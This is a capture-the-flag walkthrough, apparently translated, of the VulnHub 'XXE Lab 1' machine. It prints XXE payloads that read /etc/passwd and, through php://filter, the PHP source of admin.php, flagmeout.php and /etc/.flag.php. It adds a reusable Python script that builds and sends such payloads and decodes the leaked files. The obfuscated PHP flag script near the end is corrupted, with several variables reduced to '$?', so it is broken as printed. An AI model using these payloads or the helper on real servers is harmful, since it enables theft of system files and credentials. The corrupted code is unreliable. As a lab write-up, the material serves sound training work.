

【攻略鴨】XXE Lab 1 VulnHub target machine walkthrough

2023-01-06 11:06 Author: 攻略鴨

The content of this article is entirely fictional; 攻略鴨 on Bilibili asks for your follows and likes!

Target address (found with arp-scan on the local segment):

$ sudo arp-scan -l
192.168.221.151

http://192.168.221.151/xxe/

External reconnaissance

Port scan

80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.27 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/xxe/* /admin.php
5355/tcp open  llmnr   syn-ack ttl 1

Website information

The page shows a login form. Try logging in and capture the request. The body is an XML document (even though the Content-Type is text/plain), which is the cue to test for XXE:

POST /xxe/xxe.php HTTP/1.1
Host: 192.168.221.151
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 95
Origin: http://192.168.221.151
Connection: close
Referer: http://192.168.221.151/xxe/

<?xml version="1.0" encoding="UTF-8"?><root><name>tester</name><password>test</password></root>

Modify the request to test for external entity expansion. The DOCTYPE names the document type r while the root element is root; matching the two is only a validity constraint, and the libxml2 parser behind PHP's DOM/SimpleXML does not enforce it in non-validating mode, so the payload still works:

POST /xxe/xxe.php HTTP/1.1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY tester SYSTEM "file:///etc/passwd">
]>
<root><name>&tester;</name><password>test</password></root>

Response:

root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[... part omitted ...]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:104:108::/home/syslog:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
_apt:x:106:65534::/nonexistent:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
r00t:x:1000:1000:Administrator,,,:/home/r00t:/bin/bash

So the endpoint has an XXE vulnerability: the external entity was resolved on the server and its content reflected in the response, and the leaked /etc/passwd already shows one interactive account, r00t.
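The probing steps above, as an added Python helper that is not part of the original walkthrough: it builds the same DOCTYPE payload for any resource (a file:// path or a php://filter wrapper), pulls a Base64 blob out of the reflected HTML, and lists the interactive-shell accounts from a leaked /etc/passwd. TARGET is the endpoint from the walkthrough; the HTML response and passwd lines in the block are constructed samples, and the assumption that the application reflects the <name> value somewhere in its HTML is taken from the response shown above.

```python
"""Added example: XXE probe helpers for the xxe.php login endpoint."""
import base64
import re
import urllib.request
from typing import List

TARGET = "http://192.168.221.151/xxe/xxe.php"   # endpoint from the walkthrough


def build_payload(resource: str, entity: str = "tester") -> bytes:
    """Return the XML login body with `resource` pulled in via an external entity.

    The entity is referenced from <name>, the field the application reflects.
    `resource` is any URI the server's XML parser will fetch, e.g.
    file:///etc/passwd, or a php://filter wrapper for PHP source.
    """
    xml = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE root [\n"
        "  <!ELEMENT root ANY>\n"
        f'  <!ENTITY {entity} SYSTEM "{resource}">\n'
        "]>\n"
        f"<root><name>&{entity};</name><password>test</password></root>"
    )
    return xml.encode("utf-8")


def php_source(path: str) -> str:
    """php://filter URI that Base64-encodes a file before the parser sees it.

    Raw PHP contains '<' and '&', which would make the entity replacement text
    malformed XML; Base64 keeps the leak inside the XML character set.
    """
    return f"php://filter/read=convert.base64-encode/resource={path}"


def send(body: bytes, url: str = TARGET) -> str:
    """POST the body with the same Content-Type the captured request used."""
    req = urllib.request.Request(
        url, data=body, method="POST",
        headers={"Content-Type": "text/plain;charset=UTF-8"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


_B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_base64(html: str) -> str:
    """Pick the longest Base64 run reflected in the HTML and decode it.

    Heuristic: the leaked file is the longest Base64-looking token on the page;
    ordinary markup words are shorter than 16 characters.
    """
    runs = _B64_RUN.findall(html)
    if not runs:
        raise ValueError("no Base64 blob in response")
    return base64.b64decode(max(runs, key=len)).decode("utf-8", errors="replace")


def shell_users(passwd: str) -> List[str]:
    """Accounts from a leaked /etc/passwd whose shell is not nologin/false."""
    users = []
    for line in passwd.splitlines():
        parts = line.split(":")
        if len(parts) == 7 and not parts[6].endswith(("nologin", "false")):
            users.append(parts[0])
    return users


# Constructed sample data (not captured from the target) for offline use.
SAMPLE_SOURCE = "<?php\n$flag = 'demo';\necho $flag;\n?>"
SAMPLE_RESPONSE = (
    "<html><body><p>Hello "
    + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
    + "</p></body></html>"
)
SAMPLE_PASSWD = (
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "syslog:x:104:108::/home/syslog:/bin/false\n"
    "r00t:x:1000:1000:Administrator,,,:/home/r00t:/bin/bash\n"
)

if __name__ == "__main__":
    # Against the live lab:
    #   print(extract_base64(send(build_payload(php_source("admin.php")))))
    print(build_payload(php_source("admin.php")).decode())
    print(extract_base64(SAMPLE_RESPONSE))
    print(shell_users(SAMPLE_PASSWD))
```

Against the live lab, extract_base64(send(build_payload(php_source("admin.php")))) returns the source of admin.php; send is the only network call and is not exercised by the sample data.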

XXE exploitation

Requesting http://192.168.221.151/admin.php directly returns 404.

Use XXE to read the PHP source instead. A plain file:// read of a .php file fails because the fetched text is parsed as XML content and PHP source contains bare & and unclosed < tags, so wrap the read in php://filter to Base64-encode it first. The relative resource=admin.php is resolved against the PHP process's working directory (the script's own directory under Apache mod_php), so this reads /xxe/admin.php, which is consistent with /admin.php returning 404:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">

After Base64-decoding the response, the main content is:

<?php
    $msg = '';
    if (isset($_POST['login']) && !empty($_POST['username'])
        && !empty($_POST['password'])) {

        if ($_POST['username'] == 'administhebest' &&
            md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
            $_SESSION['valid'] = true;
            $_SESSION['timeout'] = time();
            $_SESSION['username'] = 'administhebest';

            echo "You have entered valid use name and password <br />";
            $flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
            echo $flag;
        }else {
            $msg = 'Maybe Later';
        }
    }
?>
</div> <!-- W00t/W00t -->

Putting the information above together:

Flag location: /flagmeout.php
username: administhebest
password: admin@123 (md5: e6e061838856bf47e1de730719fb2609)
W00t/W00t (the comment left at the end of the page)

Use XXE to read flagmeout.php:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php">

返回值Base64解碼后為:

<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>

The comment says the flag is in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5). A 32-character string drawn only from A-Z and 2-7 is Base32; decoding it gives L2V0Yy8uZmxhZy5waHA=, and Base64-decoding that gives /etc/.flag.php.
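The two-layer decode above, as an added Python example that is not part of the original walkthrough. It goes slightly beyond the page: peel() strips Base32 and Base64 layers one at a time, trying Base32 first because its alphabet is a subset of Base64's, and stops when the result is no longer decodable or not printable ASCII. decode_hint() pulls the bracketed token out of the flagmeout.php comment; the only input is the comment text from the page.

```python
"""Added example: peel the Base32-then-Base64 hint from flagmeout.php."""
import base64
import re
from typing import List

HINT_RE = re.compile(r"\(([A-Z2-7]{32})\)")   # 32-char Base32 token in the HTML comment
B32_RE = re.compile(r"[A-Z2-7]+=*")
B64_RE = re.compile(r"[A-Za-z0-9+/]+=*")


def peel(token: str, max_layers: int = 5) -> List[str]:
    """Strip Base32/Base64 layers one at a time and return every intermediate.

    Base32 is tried first because its alphabet (A-Z, 2-7) is a subset of the
    Base64 alphabet, so an all-uppercase token would otherwise be misread as
    Base64. Decoding stops when the result is not printable ASCII or no decoder
    accepts the string, which is the signal that the real payload is reached.
    """
    layers = [token]
    for _ in range(max_layers):
        cur = layers[-1]
        decoded = None
        if B32_RE.fullmatch(cur) and len(cur) % 8 == 0:
            try:
                decoded = base64.b32decode(cur)
            except ValueError:          # binascii.Error is a ValueError
                decoded = None
        if decoded is None and B64_RE.fullmatch(cur) and len(cur) % 4 == 0:
            try:
                decoded = base64.b64decode(cur, validate=True)
            except ValueError:
                decoded = None
        if decoded is None:
            break
        try:
            text = decoded.decode("ascii")
        except UnicodeDecodeError:
            break
        if not text.isprintable():
            break
        layers.append(text)
    return layers


def decode_hint(flagmeout_src: str) -> str:
    """Find the bracketed token in flagmeout.php's comment and peel it to a path."""
    m = HINT_RE.search(flagmeout_src)
    if not m:
        raise ValueError("no Base32 hint found")
    return peel(m.group(1))[-1]


if __name__ == "__main__":
    src = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->"   # comment from the page
    for step in peel("JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5"):
        print(step)
    print(decode_hint(src))
```

peel() returns the full chain, so the intermediate L2V0Yy8uZmxhZy5waHA= is visible alongside the final /etc/.flag.php; if a token happens to be valid in both alphabets, check the intermediate before trusting the last layer.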

Use XXE to read /etc/.flag.php:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">

The response is again Base64; decoding it gives:

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$à=+_;$á=$?=$?=$?=$?=$è=$é=$ê=$?=++$á[];$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$è++;$è++;$è++;$è++;$è++;$é++;$é++;$é++;$é++;$é++;$é++;$ê++;$ê++;$ê++;$ê++;$ê++;$ê++;$ê++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$__('$_="'.$___.$á.$?.$?.$___.$á.$à.$á.$___.$á.$à.$è.$___.$á.$à.$?.$___.$á.$?.$?.$___.$á.$?.$à.$___.$á.$é.$?.$___.$á.$é.$à.$___.$á.$é.$à.$___.$á.$?.$?.$___.$á.$?.$é.$___.$á.$?.$á.$___.$á.$è.$?.$___.$á.$?.$é.$___.$á.$è.$?.$___.$á.$?.$é.$___.$á.$?.$é.$___.$á.$?.$?.$___.$á.$?.$á.$___.$á.$è.$?.$___.$á.$é.$á.$___.$á.$é.$?.'"');$__($_);

Prepend <?php to the script and run it to get the flag: SAFCSP{xxe_is_so_easy}. Note that the script is obfuscated: its last two statements hand a string assembled at runtime to a variable function, $__(...), so it executes whatever it decodes. Run it in a disposable PHP container rather than on your own machine, and print $_ before the final $__($_); call if you want to read the decoded code first.

